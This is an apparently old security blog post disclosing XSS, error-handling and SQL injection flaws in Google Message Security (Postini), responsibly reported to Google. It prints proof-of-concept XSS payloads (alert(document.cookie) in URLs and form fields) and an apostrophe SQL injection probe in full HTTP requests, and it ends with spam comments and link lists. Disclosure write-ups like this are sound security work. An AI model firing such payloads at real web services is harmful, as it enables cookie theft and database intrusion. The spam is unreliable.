NOTE: all the vulnerabilities discussed in this article were responsible disclosed to Google back in January 2010.
While driving an initiative on 'Testing the Enterprise Security Infrastructure', I've been looking sometime at the beginning of the year to assess some SaaS (Software-as-a-Service) enterprise e-mail security solutions. Thus, I came across Google Message Security (powered by Postini). Bundled with Google Apps Premiere, you can easily get your hands on the Google e-mail security services for 50$/year - a real bargain :)
After setting my Google Apps Premiere account, there it was. From the Apps account, two Google Message Security services were available: the Security Console (Admin console) - used to manage the organization resources (domains, users, filtering rules, etc), and the Message Center - used by the end-user to manage the quarantined e-mails and filtering settings. The Message Center comes in two flavors: Message Center II is the latest version (set by default for end-users). However, the older user interface known as Message Center Classic was still accessible to an authenticated user (after tweaking the URL a bit).
The original plan was to refresh an older security test plan I used for assessing various products from Barracuda Networks and Symantec. However, I quickly realized that I got much more that I bargained for. The Google Message Security SaaS was vulnerable to various security vulnerabilities, including multiple persistent and reflected Cross-Site Scripting (XSS), improper error handling, and the most interesting of all, SQL Injection.
And here they are!
A. Multiple XSS vulnerabilities in Security Console
(MVSA-10-002)
First, a persistent XSS vulnerability identified to affect /exec/admin_orgs resource allows injecting and persistently storing malicious scripting code via setconf-neworg parameter.
setconf-neworg=test%3Cimg+onmouseover%3D%22javascript%3A+alert%28document.cookie%29%22%3E
The attack persisted malicious scripting code into the name of a new organization. When queried for details, the malicious scripting code successfully executed in the client's browser.
Multiple reflected XSS vulnerabilities were also identified for /exec/admin_list and /exec/admin_auth resources:
- in ORGS and USERS > Organization
https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
https://ac-s200.postini.com/exec/admin_list?type=orgs&sortkeys=orgtag:h&orgtagqs=%22%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
...
- in ORGS and USERS > Users
https://ac-s200.postini.com/exec/admin_list?type=users&childorgs=0&type_of_user=all&addressqs=&aliases=1&childorgs=1”><>&Search=Search
- in ORGS and USERS > Authorization
POST /exec/admin_auth?action=display_summary HTTP/1.1
Host: ac-s200.postini.com
...
redir=+List+&targetAddress=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.google.com%3E%3C%2Fiframe%3E&targetOrg=%5Bdomain.com%5D+Account+Administrators¤tOrg=100059875
... and so on.
B. Multiple reflected XSS in Message Center Classic
(MVSA-10-002)
Following the submission of incorrectly formatted e-mails for Approved and Blocked senders lists, injected malicious code was included in the
invalid e-mail format error messages displayed to the user.
POST /exec/MsgSet?action=change_MsgSettings HTTP/1.1
Host: mc-s200.postini.com
...
add-good_addresses=a%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Save+to+List&submit=Save+to+List
The result is shown below:
C. Reflected XSS in Message Center II
(MVSA-10-002)
Manipulation of source_uri parameter of /msgctr/message_display resource allowed reflected XSS attacks.
https://ac-s200.postini.com/msgctr/message_display?id=yyy&trash=trash&source_uri=%2Fapp%2Fmsgctr%2Ftrash%2 2%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
D. Improper Error Handling in Security Console
(MVSA-10-003)
Manipulation of beg_date and end_date parameters of /exec/adminRep resource returned the following error:
----------------------
There was a problem processing your request. Please click the Back button and try again.
If you continue to see the problem, please report it to your system administrator or support contact with the following information.
Time: Thu Jan 21 23:53:08 2010 GMT Request ID: 20593BC6-06E8-11DF-93DD-E3695903FD3E
Request URL: /exec/adminRep?action=displayReport&targetorgid=100059876&cat=out_virus&report=sender&beg_date=20100120%27&end_date=20100120&org_agg=orgh
System: ac-s200.postini.com-
Message: function(): not a valid date at /product/build/folder1/folder2/component line 137.
----------------
The returned error disclosed details about the component implementing the functionality, it's location on the server, and technology being used. It could be handy for devising further attacks ;)
E. SQL Injection in Message Center II
(MVSA-10-001)
Manipulation of sort_direction parameter of /junk_quarantine/process and /trash/process resources allowed successful SQL Injection attacks against Message Center II service.
POST https://mc-s200.postini.com/app/msgctr/junk_quarantine/process HTTP/1.1
Host: mc-s200.postini.com
...
Content-Type: multipart/form-data; boundary=---------------------------26418279386900
Content-Length: 1351
-----------------------------26418279386900
Content-Disposition: form-data; name="_submitted_junk_quarantine_form"
1
...
-----------------------------26418279386900
Content-Disposition: form-data; name="range_menu"
1-14
-----------------------------26418279386900
Content-Disposition: form-data; name="sort_menu"
from_asc
-----------------------------26418279386900
Content-Disposition: form-data; name="sort_direction"
desc'
-----------------------------26418279386900
...
The extra apostrophe used for the initial test caused the following system error:
Apart of providing details on the database engine used, error type and middleware settings, the returned error confirmed the service was vulnerable to SQL Injection. Additional test cases were devised to confirm the issue.
As confirmed by Google Security Team, such vulnerabilities were affecting Google Message Security release 6_24 (January), 6_25 (Feb), 6_26 (March) and 6_27 (April). Additional details are available in MVSA-10-001, MVSA-10-002 and MVSA-10-003 security advisories.
Enjoy!
Looking for a penetration testing tool? Use high rated Metasploit to spot security problems and verify mitigations. Free transfer on the market here!
ReplyDeletesaas security
mobile security
cloud security
data safety
data integrity
was having the same problem in the other account in Firefox! I logged off the problematic account in Firefox and logged in with the account from IE, there was no problem. sign up hotmail.com
ReplyDeletefitflops clearance
ReplyDeletesalomon boots
north face outlet store
jimmy choo shoes
salomon
shoes jordan
nfl jerseys
new balance 574
michael kors purses
official coach factory online sale
celine bags
coach outlet
north face outlet
fitflop outlet
michael kors outlet online sale
asics
cheap north face
michael kors outlet stores
michael kors handbag
kate spade purses
michael kors handbags
coach purses
girls north face jackets
coach factory outlet
kate spade outlet
swarovski
vans shoes clearance
jordan retro 11
lebron james shoes
michael kors outlet online
louboutin shoes
clarks
nike outlet store online
fendi handbags
michael kors outlet store
red bottom shoes
nike outlet
supra shoes
longchamp
coach factory
20160618yxj
http://serrurierparisexpress.fr/ a eu le plaisir de visiter le blog.
ReplyDeletehttp://www.cruzroja.es/creforumvolint_en/user/profile/27951.page
ReplyDeletehttps://wacom.ccnsite.com/lindaesthe3df3/
https://pennlets.com/author/lindaesthetique/
https://community.cbr.com/member.php?92462-lindaesthetique
http://www.getzcope.com/forum/comments.php?DiscussionID=27783
https://forum.avscripts.net/member.php?30134-lindaesthetique
https://subrion.org/members/info/lindaesthetique.html
https://www.datanumen.com/forums/member.php/19285-lindaesthetique
https://www.coh2.org/user/31053/lindaesthetique
https://www.turnkeylinux.org/user/438658
chirurgie tunisie
ReplyDeleteabdominoplastie
ReplyDeletechirurgieTunisie
augmentation mammaire
liposuccion
lifting visage
rhinoplastie medicale
chirurgie plastique
esthetique tunisie
chirurgieTunisie pas cher
vitrier paris 5eme
ReplyDelete